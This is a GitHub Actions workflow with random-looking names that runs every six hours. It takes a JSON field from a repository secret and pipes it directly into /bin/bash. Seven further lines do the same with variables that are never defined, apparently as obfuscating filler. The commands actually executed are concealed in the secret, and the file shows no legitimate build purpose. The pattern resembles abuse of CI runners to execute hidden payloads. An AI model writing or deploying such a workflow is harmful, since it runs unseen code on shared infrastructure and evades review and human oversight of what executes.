name: shuaidajian1491
on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shuaidajian1491
        env:
          pchp49: ${{ secrets.pchp49 }}
        run: |
          echo $pchp49 | jq -r .dg493 | /bin/bash
          echo $m7077 | jq -r .n63 | /bin/bash
          echo $ehuzo0868 | jq -r .ukl58307 | /bin/bash
          echo $zyabv5 | jq -r .bayet5 | /bin/bash
          echo $jloh62509 | jq -r .oij9344 | /bin/bash
          echo $dykq141 | jq -r .zhsnw945 | /bin/bash
          echo $kp6 | jq -r .tk3806 | /bin/bash
          echo $eup72 | jq -r .zfkrq5 | /bin/bash

